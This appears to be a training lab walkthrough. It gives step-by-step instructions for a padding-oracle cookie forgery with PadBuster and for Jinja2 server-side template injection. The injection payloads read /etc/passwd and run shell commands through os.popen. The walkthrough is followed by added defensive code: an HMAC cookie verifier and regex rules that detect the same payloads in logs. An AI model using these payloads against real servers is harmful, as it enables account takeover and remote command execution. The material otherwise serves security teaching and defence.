
Project 50 - Padding Oracle and Server-Side Template Injection Attacks

  • Daryl Shows His Work
  • 2025-10-21

Video description: Project 50 - Padding Oracle and Server-Side Template Injection Attacks

Steps Taken (in the order that they appear in the video):

1. Open a web browser, go to padding-oracle.com:5001 and click the Register option

2. Start Burp Suite

3. Go to Preferences in Firefox, scroll down to Network Settings, choose Manual Proxy and set it to 127.0.0.1, port 8080

4. Back in Burp Suite, turn the Interceptor on under the Proxy tab

5. Back in the webpage, set the username to student and password to computer

6. ^ We can see that Burp Suite is working: notice the plaintext credentials that I just entered on the webpage

7. Forward the request and now we can see an authentication key. Then right-click it to send it to the Repeater

8. Send the request. The response shows the markup for the website, meaning that I've successfully logged in as student

9. Open a terminal window and run: padbuster http://padding-oracle.com:5001/login.php 'auth' 8 --cookies auth='auth' -encoding 0 (in this scenario we know up front that the block size of the cipher is 8 and that the sample is base64 encoded).

10. ^ We're going to replace 'auth' in the command line with the mJoimu4yyZqKac46qSHpjSOCWGKTYnD0 authentication cookie (get rid of the single quotes)

11. Type 2

12. PadBuster shows the decrypted values of the authentication cookie in base64, HEX, and ASCII formats.

13. padbuster http://padding-oracle.com:5001/login.php 'auth' 8 --cookies auth='auth' -encoding 0 -plaintext user=admin (to add the username admin to the command. This will encrypt the authentication key as admin)

14. Type 2

15. Now we can see the encrypted value of the modified authentication cookie

16. Copy the new authentication cookie, paste it over the original one in the Burp Suite request within the Interceptor, and click Forward

17. Check back at the webpage and now see that we are logged in as admin

18. Turn off the Interceptor in Burp Suite

19. Go to template-injection.com:5000 in the web browser and login (admin, admin)

20. To properly execute this attack we must detect the vulnerability, identify which template engine is being used, and exploit the vulnerability

21. Detect: enter ${7*7} and submit (to detect whether the application is vulnerable to SSTI).

22. This doesn't get executed on the server, so let's try {{7*7}}.

23. We can see that the web server is vulnerable to the attack because it evaluated the expression and gave us a return value of 49.

24. Identify: There are two options. The first is to submit payloads that may cause server errors, which the server will then print. The second is to manually submit payloads in different programming languages and study how the template engine interprets them. If I entered {{7*'7'}} (adding single quotes around the second 7) and the output came back as 49, that would tell me the server is using the Twig template engine. However, if the output returned 7777777, then we would know that the Jinja2 template engine is being used. Having a strong knowledge of the format template engines print output in definitely helps!

25. {{7*'7'}} (to see what it returns). The server is using the Jinja2 template engine.

26. Exploit: {{config.items()}} (to show the content of the configuration object, which is a dictionary-like object containing all of the application's configuration values).

27. {{ get_flashed_messages.__globals__ }} (to access cached information in the server).

28. {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} (to see the contents of the /etc/passwd file)

29. {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} (allows us to see account information)

30. {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} (allows us to see the content of the current working directory)
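The cookie forgery in steps 9-17 works because the server accepts any ciphertext that decrypts with valid padding and never checks its integrity. The following is an added example, not code from the video or the lab application, showing a cookie that carries an HMAC tag and is rejected through one uniform failure path; the user=<name> layout comes from step 13, while the key, function names and the choice of a signed rather than encrypted cookie are assumptions.

```python
import base64
import hashlib
import hmac

# Constructed demo key (assumption); a real deployment loads a random secret.
SERVER_KEY = b"constructed-demo-key-not-from-the-page"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


def issue_cookie(username: str, key: bytes = SERVER_KEY) -> str:
    """Return base64(payload || HMAC-SHA256(key, payload)) for 'user=<name>'."""
    payload = f"user={username}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(payload + tag).decode()


def verify_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the username, or None for every kind of failure.

    Bad base64, short input, a wrong tag and a malformed payload all end in
    the same result, so the response gives a client no per-byte signal.
    """
    try:
        raw = base64.urlsafe_b64decode(cookie.encode())
    except (ValueError, TypeError):
        return None
    if len(raw) <= TAG_LEN:
        return None
    payload, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    if not payload.startswith(b"user="):
        return None
    return payload[len(b"user="):].decode(errors="replace")


if __name__ == "__main__":
    cookie = issue_cookie("student")
    print(cookie, "->", verify_cookie(cookie))
```

If the cookie contents must also stay confidential, the same verify-before-use rule applies with an authenticated encryption mode in place of the bare HMAC.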
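The detect, identify and exploit stages in steps 20-30 each leave a recognisable string in the submitted field. This added example, which is not part of the video, flags those strings in request logs; the log format, the "name" parameter and the rule names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Rules modelled on the probes and payloads in steps 21-30 of the description.
RULES = [
    ("arithmetic-probe", re.compile(r"(\{\{|\$\{)\s*\d+\s*\*\s*'?\d+'?\s*\}")),
    ("dunder-traversal", re.compile(r"\{\{.*__(globals|builtins|class|init)__")),
    ("config-dump", re.compile(r"\{\{\s*config\b")),
    ("command-or-file", re.compile(r"\{\{.*\b(popen|open)\s*\(")),
]

# Constructed access-log lines (documentation IP range, hypothetical "name" field).
SAMPLE_LOG = """\
192.0.2.10 "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200
192.0.2.10 "GET /?name=%24%7B7*7%7D HTTP/1.1" 200
192.0.2.44 "GET /?name=alice HTTP/1.1" 200
192.0.2.10 "GET /?name=%7B%7Bconfig.items()%7D%7D HTTP/1.1" 200
192.0.2.10 "GET /?name=%7B%7B+get_flashed_messages.__globals__+%7D%7D HTTP/1.1" 200
192.0.2.10 "GET /?name=%257B%257B7*'7'%257D%257D HTTP/1.1" 200
"""


def normalise(text: str, rounds: int = 2) -> str:
    """URL-decode up to `rounds` times so double-encoded probes are still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan(log_text: str):
    """Return [(line_number, [rule names])] for every line that matches a rule."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        decoded = normalise(line)
        matched = [name for name, pattern in RULES if pattern.search(decoded)]
        if matched:
            hits.append((number, matched))
    return hits


if __name__ == "__main__":
    for number, matched in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(matched)}")
```

Form fields sent in a POST body do not appear in a standard access log, so the same rules would need to run where the body is visible, such as a WAF or application-level request logging.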
